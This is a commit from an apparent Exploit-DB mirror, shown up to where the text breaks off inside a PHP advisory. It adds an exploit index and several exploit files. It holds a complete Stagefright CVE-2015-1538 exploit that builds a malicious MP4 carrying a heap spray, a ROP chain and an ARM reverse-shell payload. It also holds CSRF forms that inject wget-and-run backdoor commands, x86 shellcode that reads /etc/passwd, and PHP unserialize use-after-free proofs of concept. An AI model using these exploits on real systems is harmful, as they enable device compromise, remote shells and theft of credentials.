bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-09-10

Browse source 
15 new exploits
This commit is contained in:
Offensive Security 2015-09-10 05:04:12 +00:00
parent 97d811ea96
commit 229204741f
16 changed files with 1501 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

15
files.csv
View file

@ -34403,6 +34403,7 @@ id,file,description,date,author,platform,type,port
38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin 'language' Parameter Local File Include Vulnerability",2012-12-30,Amirh03in,php,webapps,0
38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme 'codigo' Parameter SQL Injection Vulnerability",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0
38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop 'f_email' Parameter SQL Injection Vulnerability",2012-12-04,AkaStep,php,webapps,0
38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit (Shell Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0
38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,metasploit,linux,remote,10443
38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
@ -34410,3 +34411,17 @@ id,file,description,date,author,platform,type,port
38108,platforms/windows/dos/38108.txt,"Advantech WebAccess 8.0_ 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0
38109,platforms/linux/remote/38109.pl,"Oracle MySQL and MariaDB Insecure Salt Generation Security Bypass Weakness",2012-12-06,kingcope,linux,remote,0
38110,platforms/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",php,webapps,0
38111,platforms/php/webapps/38111.txt,"Wordpress Simple Gmail Login Plugin Stack Trace Information Disclosure Vulnerability",2012-12-07,"Aditya Balapure",php,webapps,0
38112,platforms/php/webapps/38112.txt,"FOOT Gestion 'id' Parameter SQL Injection Vulnerability",2012-12-07,"Emmanuel Farcy",php,webapps,0
38113,platforms/php/webapps/38113.php,"VBulletin ajaxReg Module SQL Injection Vulnerability",2012-12-08,"Cold Zero",php,webapps,0
38114,platforms/cgi/webapps/38114.html,"Smartphone Pentest Framework Multiple Remote Command Execution Vulnerabilities",2012-12-10,"High-Tech Bridge",cgi,webapps,0
38115,platforms/php/webapps/38115.txt,"SimpleInvoices invoices Module Unspecified Customer Field XSS",2012-12-10,tommccredie,php,webapps,0
38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0
38118,platforms/xml/webapps/38118.txt,"Qlikview <= 11.20 SR11 - Blind XXE Injection Vulnerability",2015-09-09,"Alex Haynes",xml,webapps,0
38119,platforms/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - CSRF Vulnerability",2015-09-09,"Aryan Bayaninejad",php,webapps,0
38120,platforms/php/dos/38120.txt,"PHP SplDoublyLinkedList unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38121,platforms/php/dos/38121.txt,"PHP GMP unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38122,platforms/php/dos/38122.txt,"PHP SplObjectStorage unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38123,platforms/php/dos/38123.txt,"PHP Session Deserializer Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38124,platforms/android/remote/38124.py,"Android Stagefright - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0
38125,platforms/php/dos/38125.txt,"PHP unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0

Can't render this file because it is too large.

377
platforms/android/remote/38124.py Executable file
View file

@ -0,0 +1,377 @@
#!/usr/bin/env python
# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
# Shout outs to our friends at Optiv (formerly Accuvant Labs)
# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
# www.zimperium.com
#
# Exploit for RCE Vulnerability CVE-2015-1538 #1
# Integer Overflow in the libstagefright MP4 stsc atom handling
#
# Dont forget, the output of “create_mp4” can be delivered many ways!
# MMS is the most dangerous attack vector, but not the only one…
#
# DISCLAIMER: This exploit is for testing and educational purposes only. Any
# other usage for this code is not allowed. Use at your own risk.
#
# “With great power comes great responsibility.” Uncle Ben
#
import struct
import socket
#
# Creates a single MP4 atom LEN, TAG, DATA
#
def make_chunk(tag, data):
if len(tag) != 4:
raise Yo! They call it FourCC for a reason.
ret = struct.pack(>L, len(data) + 8)
ret += tag
ret += data
return ret
#
# Make an stco atom Sample Table Chunk Offets
#
def make_stco(extra=):
ret = struct.pack(>L, 0) # version
ret += struct.pack(>L, 0) # mNumChunkOffsets
return make_chunk(stco, ret+extra)
#
# Make an stsz atom Sample Table Size
#
def make_stsz(extra=):
ret = struct.pack(>L, 0) # version
ret += struct.pack(>L, 0) # mDefaultSampleSize
ret += struct.pack(>L, 0) # mNumSampleSizes
return make_chunk(stsz, ret+extra)
#
# Make an stts atom Sample Table Time-to-Sample
#
def make_stts():
ret = struct.pack(>L, 0) # version
ret += struct.pack(>L, 0) # mTimeToSampleCount
return make_chunk(stts, ret)
#
# This creates a single Sample Table Sample-to-Chunk entry
#
def make_stsc_entry(start, per, desc):
ret =
ret += struct.pack(>L, start + 1)
ret += struct.pack(>L, per)
ret += struct.pack(>L, desc)
return ret
#
# Make an stsc chunk Sample Table Sample-to-Chunk
#
# If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and
# cause a heap overflow.
#
def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):
ret = struct.pack(>L, 0) # version/flags
# this is the clean version…
if not do_overflow:
ret += struct.pack(>L, num_alloc) # mNumSampleToChunkOffsets
ret += Z * (12 * num_alloc)
return make_chunk(stsc, ret)
# now the explicit version. (trigger the bug)
ret += struct.pack(>L, 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets
# fill in the entries that will overflow the buffer
for x in range(0, num_write):
ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)
ret = make_chunk(stsc, ret)
# patch the data_size
ret = struct.pack(>L, 8 + 8 + (num_alloc * 12)) + ret[4:]
return ret
#
# Build the ROP chain
#
# ROP pivot by Georg Wicherski! Thanks!
#
(gdb) x/10i __dl_restore_core_regs
0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34
0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5}
0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5}
0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}
0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc}
b0001144 <__dl_mprotect>:
b0001144: e92d0090 push {r4, r7}
b0001148: e3a0707d mov r7, #125 ; 0x7d
b000114c: ef000000 svc 0x00000000
b0001150: e8bd0090 pop {r4, r7}
b0001154: e1b00000 movs r0, r0
b0001158: 512fff1e bxpl lr
b000115c: ea0015cc b b0006894 <__dl_raise+0x10>
def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):
rop =
rop += struct.pack(<L, sp_addr + off + 0x10) # new sp
rop += struct.pack(<L, 0xb0002a98) # new lr pop {pc}
rop += struct.pack(<L, 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc}
rop += struct.pack(<L, sp_addr & 0xfffff000) # new r0 base address (page aligned)
rop += struct.pack(<L, 0x1000) # new r1 length
rop += struct.pack(<L, 7) # new r2 protection
rop += struct.pack(<L, 0xd000d003) # new r3 scratch
rop += struct.pack(<L, 0xd000d004) # new r4 scratch
rop += struct.pack(<L, 0xb0001144) # new pc _dl_mprotect
native_start = sp_addr + 0x80
rop += struct.pack(<L, native_start) # address of native payload
#rop += struct.pack(<L, 0xfeedfed5) # top of stack…
# linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
buf =
# fork
buf += \x02\x70\xa0\xe3
buf += \x00\x00\x00\xef
# continue if not parent…
buf += \x00\x00\x50\xe3
buf += \x02\x00\x00\x0a
# exit parent
buf += \x00\x00\xa0\xe3
buf += \x01\x70\xa0\xe3
buf += \x00\x00\x00\xef
# setsid in child
buf += \x42\x70\xa0\xe3
buf += \x00\x00\x00\xef
# socket/connect/dup2/dup2/dup2
buf += \x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c
buf += \x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60
buf += \xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0
buf += \xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1
buf += \x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06
buf += \x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00
buf += \x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0
buf += \xe3\x00\x00\x00\xef
# execve(shell, argv, env)
buf += \x30\x00\x8f\xe2\x04\x40\x24\xe0
buf += \x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d
buf += \x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00
buf += \x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00
buf += \xef\x02\x00
# Add the connect back host/port
buf += struct.pack(!H, cb_port)
cb_host = socket.inet_aton(cb_host)
buf += struct.pack(=4s, cb_host)
# shell
buf += /system/bin/sh\x00\x00
# argv
buf += sh\x00\x00
# env
buf += PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00
# Add some identifiable stuff, just in case something goes awry…
rop_start_off = 0x34
x = rop_start_off + len(rop)
while len(rop) < 0x80 rop_start_off:
rop += struct.pack(<L, 0xf0f00000+x)
x += 4
# Add the native payload…
rop += buf
return rop
#
# Build an mp4 that exploits CVE-2015-1538 #1
#
# We mimic meow.3gp here…
#
def create_mp4(sp_addr, newpc_val, cb_host, cb_port):
chunks = []
# Build the MP4 header…
ftyp = mp42
ftyp += struct.pack(>L, 0)
ftyp += mp42
ftyp += isom
chunks.append(make_chunk(ftyp, ftyp))
# Note, this causes a few allocations…
moov_data =
moov_data += make_chunk(mvhd,
struct.pack(>LL, 0, 0x41414141) +
(B * 0x5c) )
# Add a minimal, verified trak to satisfy mLastTrack being set
moov_data += make_chunk(trak,
make_chunk(stbl,
make_stsc(0x28, 0x28) +
make_stco() +
make_stsz() +
make_stts() ))
# Spray the heap using a large tx3g chunk (can contain binary data!)
0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs
0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0
0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1
0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4
0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement
0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1
0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase
0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr
0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address
0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6
0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it!
page =
off = 0 # the offset to the next object
off += 8
page += struct.pack(<L, sp_addr + 8 + 16 + 8 + 12 28) # _vptr.RefBase (for when we smash mDataSource)
page += struct.pack(<L, sp_addr + off) # mRefs
off += 16
page += struct.pack(<L, 1) # mStrong
page += struct.pack(<L, 0xc0dedbad) # mWeak
page += struct.pack(<L, sp_addr + off) # mBase
page += struct.pack(<L, 16) # mFlags (dont set OBJECT_LIFETIME_MASK)
off += 8
page += struct.pack(<L, sp_addr + off) # the mBase _vptr.RefBase
page += struct.pack(<L, 0xf00dbabe) # mBase.mRefs (unused)
off += 16
page += struct.pack(<L, 0xc0de0000 + 0x00) # vtable entry 0
page += struct.pack(<L, 0xc0de0000 + 0x04) # vtable entry 4
page += struct.pack(<L, 0xc0de0000 + 0x08) # vtable entry 8
page += struct.pack(<L, newpc_val) # vtable entry 12
rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
x = len(page)
while len(page) < 4096:
page += struct.pack(<L, 0xf0f00000+x)
x += 4
off = 0x34
page = page[:off] + rop + page[off+len(rop):]
spray = page * (((2*1024*1024) / len(page)) 20)
moov_data += make_chunk(tx3g, spray)
block = A * 0x1c
bigger = B * 0x40
udta = make_chunk(udta,
make_chunk(meta,
struct.pack(>L, 0) +
make_chunk(ilst,
make_chunk(cpil, make_chunk(data, struct.pack(>LL, 21, 0) + A)) +
make_chunk(trkn, make_chunk(data, struct.pack(>LL, 0, 0) + AAAABBBB)) +
make_chunk(disk, make_chunk(data, struct.pack(>LL, 0, 0) + AAAABB)) +
make_chunk(covr, make_chunk(data, struct.pack(>LL, 0, 0) + block)) * 32 +
make_chunk(\xa9alb, make_chunk(data, struct.pack(>LL, 0, 0) + block)) +
make_chunk(\xa9ART, make_chunk(data, struct.pack(>LL, 0, 0) + block)) +
make_chunk(aART, make_chunk(data, struct.pack(>LL, 0, 0) + block)) +
make_chunk(\xa9day, make_chunk(data, struct.pack(>LL, 0, 0) + block)) +
make_chunk(\xa9nam, make_chunk(data, struct.pack(>LL, 0, 0) + block)) +
make_chunk(\xa9wrt, make_chunk(data, struct.pack(>LL, 0, 0) + block)) +
make_chunk(gnre, make_chunk(data, struct.pack(>LL, 1, 0) + block)) +
make_chunk(covr, make_chunk(data, struct.pack(>LL, 0, 0) + block)) * 32 +
make_chunk(\xa9ART, make_chunk(data, struct.pack(>LL, 0, 0) + bigger)) +
make_chunk(\xa9wrt, make_chunk(data, struct.pack(>LL, 0, 0) + bigger)) +
make_chunk(\xa9day, make_chunk(data, struct.pack(>LL, 0, 0) + bigger)))
)
)
moov_data += udta
# Make the nasty trak
tkhd1 = .join([
\x00, # version
D * 3, # padding
E * (5*4), # {c,m}time, id, ??, duration
F * 0x10, # ??
struct.pack(>LLLLLL,
0x10000, # a00
0, # a01
0, # dx
0, # a10
0x10000, # a11
0), # dy
G * 0x14
])
trak1 =
trak1 += make_chunk(tkhd, tkhd1)
mdhd1 = .join([
\x00, # version
D * 0x17, # padding
])
mdia1 =
mdia1 += make_chunk(mdhd, mdhd1)
mdia1 += make_chunk(hdlr, F * 0x3a)
dinf1 =
dinf1 += make_chunk(dref, H * 0x14)
minf1 =
minf1 += make_chunk(smhd, G * 0x08)
minf1 += make_chunk(dinf, dinf1)
# Build the nasty sample table to trigger the vulnerability here.
stbl1 = make_stsc(3, (0x1200 / 0xc) 1, sp_addr, True) # TRIGGER
# Add the stbl to the minf chunk
minf1 += make_chunk(stbl, stbl1)
# Add the minf to the mdia chunk
mdia1 += make_chunk(minf, minf1)
# Add the mdia to the track
trak1 += make_chunk(mdia, mdia1)
# Add the nasty track to the moov data
moov_data += make_chunk(trak, trak1)
# Finalize the moov chunk
moov = make_chunk(moov, moov_data)
chunks.append(moov)
# Combine outer chunks together and voila.
data = .join(chunks)
return data
if __name__ == __main__:
import sys
import mp4
import argparse
def write_file(path, content):
with open(path, wb) as f:
f.write(content)
def addr(sval):
if sval.startswith(0x):
return int(sval, 16)
return int(sval)
# The address of a fake StrongPointer object (sprayed)
sp_addr = 0x41d00010 # takju @ imm76i 2MB (via hangouts)
# The address to of our ROP pivot
newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs
# Allow the user to override parameters
parser = argparse.ArgumentParser()
parser.add_argument(-c, connectback-host, dest=cbhost, default=31.3.3.7)
parser.add_argument(-p, connectback-port, dest=cbport, type=int, default=12345)
parser.add_argument(-s, spray-address, dest=spray_addr, type=addr, default=None)
parser.add_argument(-r, rop-pivot, dest=rop_pivot, type=addr, default=None)
parser.add_argument(-o, output-file, dest=output_file, default=cve-2015-1538-1.mp4)
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
if args.spray_addr == None:
args.spray_addr = sp_addr
if args.rop_pivot == None:
args.rop_pivot = newpc_val
# Build the MP4 file…
data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
print([*] Saving crafted MP4 to %s % args.output_file)
write_file(args.output_file, data) - See more at: https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/#sthash.MbvoiMxd.dpuf

62
platforms/cgi/webapps/38114.html Executable file
View file

@ -0,0 +1,62 @@
source: http://www.securityfocus.com/bid/56881/info
Smartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities.
Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.
Smartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected.
1.
<form action="http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl"
method="post" name=f1>
<input type="hidden" name="platformDD2" value='android' />
<input type="hidden" name="hostingPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.ch &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
2.
<form action="http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl"
method="post" name=f1>
<input type="hidden" name="hostingPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
3.
<form
action="http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl"
method="post" name=f1>
<input type="hidden" name="appURLPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
4.
<form
action="http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl"
method="post" name=f1>
<input type="hidden" name="ipAddressTB" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

72
platforms/lin_x86/shellcode/38094.c Executable file
View file

@ -0,0 +1,72 @@
#!/bin/python
from sys import argv
"""
Shellcode Generator...
Create file with permission 7775
---------------------------------------------------------------------------------
Disassembly of section .text:
08048060 <.text>:
8048060: eb 12 jmp 0x8048074
8048062: 5b pop %ebx
8048063: 31 c0 xor %eax,%eax
8048065: 88 43 05 mov %al,0x5(%ebx)
8048068: b0 08 mov $0x8,%al
804806a: b1 ff mov $0xff,%cl
804806c: b5 ff mov $0xff,%ch
804806e: cd 80 int $0x80
8048070: b0 01 mov $0x1,%al
8048072: cd 80 int $0x80
8048074: e8 e9 ff ff ff call 0x8048062
8048079: 61 popa
804807a: 6a 69 push $0x69
804807c: 74 68 je 0x80480e6
804807e: 23 .byte 0x23
---------------------------------------------------------------------------------
b4ck 2 h4ck --- Ajith Kp [@ajithkp560] --- http://www.terminalcoders.blogspot.com
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
"""
bann3r = '''
/*
[][][][][][][][][][][][][][][][][][][][][][][]
[] []
[] c0d3d by Ajith Kp [ajithkp560] []
[] http://www.terminalcoders.blogspot.in []
[] []
[][][][][][][][][][][][][][][][][][][][][][][]
*/
'''
sh3ll = "\\xeb\\x12\\x5b\\x31\\xc0\\x88\\x43"
sh311 ="\\xb0\\x08\\xb1\\xff\\xb5\\xff\\xcd\\x80\\xb0\\x01\\xcd\\x80\\xe8\\xe9\\xff\\xff\\xff"
print bann3r
if len(argv)<1:
print 'Usage: '+argv[0]+' name_of_file'
else:
fil3 = argv[1]
h3x = ''
for i in range(len(fil3)):
h3x+=str('\\'+hex(ord(fil3[i]))[1:])
h3x+=str('\\' + 'x23')
l3n = '\\x'+hex((len(fil3)))[2:].zfill(2)
sh = str(sh3ll) + str(l3n) + str(sh311) + str(h3x)
print '// Compile with'
print '// $ gcc -o output source.c'
print '// $ execstack -s output'
print '// $ ./output'
print '////////////////////////////////////////////\n'
print '# include <stdio.h>'
print 'char sh[] = "'+sh+'";'
print 'main(int argc, char **argv)'
print '''{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();'''
print '}'
print '\n////////////////////////////////////////////'

76
platforms/lin_x86/shellcode/38116.c Executable file
View file

@ -0,0 +1,76 @@
/*
---------------------------------------------------------------------------------------------------
# Linux/x86 - execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL) - 75 bytes
# Tested in Zorin OS 10 x86
# Author: Ajith Kp
Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
08048060 <.text>:
8048060: eb 1f jmp 0x8048081
8048062: 5b pop %ebx
8048063: 31 c0 xor %eax,%eax
8048065: 88 43 0b mov %al,0xb(%ebx)
8048068: 88 43 18 mov %al,0x18(%ebx)
804806b: 89 5b 19 mov %ebx,0x19(%ebx)
804806e: 8d 4b 0c lea 0xc(%ebx),%ecx
8048071: 89 4b 1d mov %ecx,0x1d(%ebx)
8048074: 89 43 21 mov %eax,0x21(%ebx)
8048077: b0 0b mov $0xb,%al
8048079: 8d 4b 19 lea 0x19(%ebx),%ecx
804807c: 8d 53 21 lea 0x21(%ebx),%edx
804807f: cd 80 int $0x80
8048081: e8 dc ff ff ff call 0x8048062
8048086: 2f das
8048087: 2f das
8048088: 2f das
8048089: 2f das
804808a: 62 69 6e bound %ebp,0x6e(%ecx)
804808d: 2f das
804808e: 63 61 74 arpl %sp,0x74(%ecx)
8048091: 23 2f and (%edi),%ebp
8048093: 2f das
8048094: 65 74 63 gs je 0x80480fa
8048097: 2f das
8048098: 70 61 jo 0x80480fb
804809a: 73 73 jae 0x804810f
804809c: 77 64 ja 0x8048102
804809e: 23 41 4a and 0x4a(%ecx),%eax
80480a1: 49 dec %ecx
80480a2: 54 push %esp
80480a3: 48 dec %eax
80480a4: 41 inc %ecx
80480a5: 4a dec %edx
80480a6: 49 dec %ecx
80480a7: 54 push %esp
80480a8: 48 dec %eax
80480a9: 4b dec %ebx
80480aa: 50 push %eax
---------------------------------------------------------------------------------------------------
How To Run
$ gcc -o cat_etc_passwd cat_etc_passwd.c
$ execstack -s cat_etc_passwd
$ ./cat_etc_passwd
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x1f\x5b\x31\xc0\x88\x43\x0b\x88\x43\x18\x89\x5b\x19\x8d\x4b\x0c\x89\x4b\x1d\x89\x43\x21\xb0\x0b\x8d\x4b\x19\x8d\x53\x21\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x63\x61\x74\x23\x2f\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x23\x41\x4a\x49\x54\x48\x41\x4a\x49\x54\x48\x4b\x50";
// It will create file named 'ajith' with permission 7775
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}

103
platforms/php/dos/38120.txt Executable file
View file

@ -0,0 +1,103 @@
Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList
Taoguang Chen <[@chtg](http://github.com/chtg)> -
Write Date: 2015.8.27
Release Date: 2015.9.4
A use-after-free vulnerability was discovered in unserialize() with SplDoublyLinkedList object's deserialization and crafted object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
Affected Versions
------------
Affected is PHP 5.6 < 5.6.13
Affected is PHP 5.5 < 5.5.29
Affected is PHP 5.4 < 5.4.45
Credits
------------
This vulnerability was disclosed by Taoguang Chen.
Description
------------
while(*p == ':') {
++p;
ALLOC_INIT_ZVAL(elem);
if (!php_var_unserialize(&elem, &p, s + buf_len, &var_hash TSRMLS_CC)) {
zval_ptr_dtor(&elem);
goto error;
}
spl_ptr_llist_push(intern->llist, elem TSRMLS_CC);
}
It has been demonstrated many times before that __wakeup() leads to
ZVAL is freed from memory. However during deserialization will still
allow to use R: or r: to set references to that already freed memory.
It is possible to use-after-free attack and execute arbitrary code
remotely.
Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12.
<?php
class obj {
var $ryat;
function __wakeup() {
$this->ryat = 1;
}
}
$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";
$inner = 'i:1234;:i:1;';
$exploit = 'a:5:{i:0;i:1;i:1;C:19:"SplDoublyLinkedList":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;a:1:{i:0;R:5;}i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}';
$data = unserialize($exploit);
var_dump($data);
function ptr2str($ptr)
{
$out = '';
for ($i = 0; $i < 8; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
?>
Test the PoC on the command line:
$ php uafpoc.php
array(5) {
[0]=>
int(1)
[1]=>
&int(1)
[2]=>
object(obj)#2 (1) {
["ryat"]=>
&int(1)
}
[3]=>
array(1) {
[0]=>
int(1122334455) <=== so we can control the memory and create fake ZVAL :)
}
[4]=>
string(24) "?v?B????"
}

104
platforms/php/dos/38121.txt Executable file
View file

@ -0,0 +1,104 @@
Use After Free Vulnerability in unserialize() with GMP
Taoguang Chen <[@chtg](http://github.com/chtg)>
Write Date: 2015.8.17
Release Date: 2015.9.4
A use-after-free vulnerability was discovered in unserialize() with GMP object's deserialization that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
Affected Versions
------------
Affected is PHP 5.6 < 5.6.13
Credits
------------
This vulnerability was disclosed by Taoguang Chen.
Description
------------
static int gmp_unserialize(zval **object, zend_class_entry *ce, const
unsigned char *buf, zend_uint buf_len, zend_unserialize_data *data
TSRMLS_DC) /* {{{ */
{
...
INIT_ZVAL(zv);
if (!php_var_unserialize(&zv_ptr, &p, max, &unserialize_data TSRMLS_CC)
|| Z_TYPE_P(zv_ptr) != IS_STRING
|| convert_to_gmp(gmpnum, zv_ptr, 10 TSRMLS_CC) == FAILURE
) {
zend_throw_exception(NULL, "Could not unserialize number", 0 TSRMLS_CC);
goto exit;
}
zval_dtor(&zv);
INIT_ZVAL(zv);
if (!php_var_unserialize(&zv_ptr, &p, max, &unserialize_data TSRMLS_CC)
|| Z_TYPE_P(zv_ptr) != IS_ARRAY
) {
zend_throw_exception(NULL, "Could not unserialize properties", 0 TSRMLS_CC);
goto exit;
}
The GMP object's deserialization can create ZVAL and free its
zval_value from memory via zval_dtor(). However during deserialization
will still allow to use R: or r: to set references to that already
freed memory. It is possible to use-after-free attack and execute
arbitrary code remotely.
Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12.
<?php
$inner = 'r:2;a:1:{i:0;a:1:{i:0;r:4;}}';
$exploit = 'a:2:{i:0;s:1:"1";i:1;C:3:"GMP":'.strlen($inner).':{'.$inner.'}}';
$data = unserialize($exploit);
$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";
for ($i = 0; $i < 5; $i++) {
$v[$i] = $fakezval.$i;
}
var_dump($data);
function ptr2str($ptr)
{
$out = '';
for ($i = 0; $i < 8; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
?>
Test the PoC on the command line:
$ php uafpoc.php
array(2) {
[0]=>
int(1122334455) <=== so we can control the memory and create fake ZVAL :)
[1]=>
object(GMP)#1 (2) {
[0]=>
array(1) {
[0]=>
int(4325299791)
}
["num"]=>
string(1) "1"
}
}

106
platforms/php/dos/38122.txt Executable file
View file

@ -0,0 +1,106 @@
Yet Another Use After Free Vulnerability in unserialize() with SplObjectStorage
Taoguang Chen <[@chtg](http://github.com/chtg)>
Write Date: 2015.8.27
Release Date: 2015.9.4
A use-after-free vulnerability was discovered in unserialize() with SplObjectStorage object's deserialization and crafted object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
Affected Versions
------------
Affected is PHP 5.6 < 5.6.13
Affected is PHP 5.5 < 5.5.29
Affected is PHP 5.4 < 5.4.45
Credits
------------
This vulnerability was disclosed by Taoguang Chen.
Description
------------
ALLOC_INIT_ZVAL(pentry);
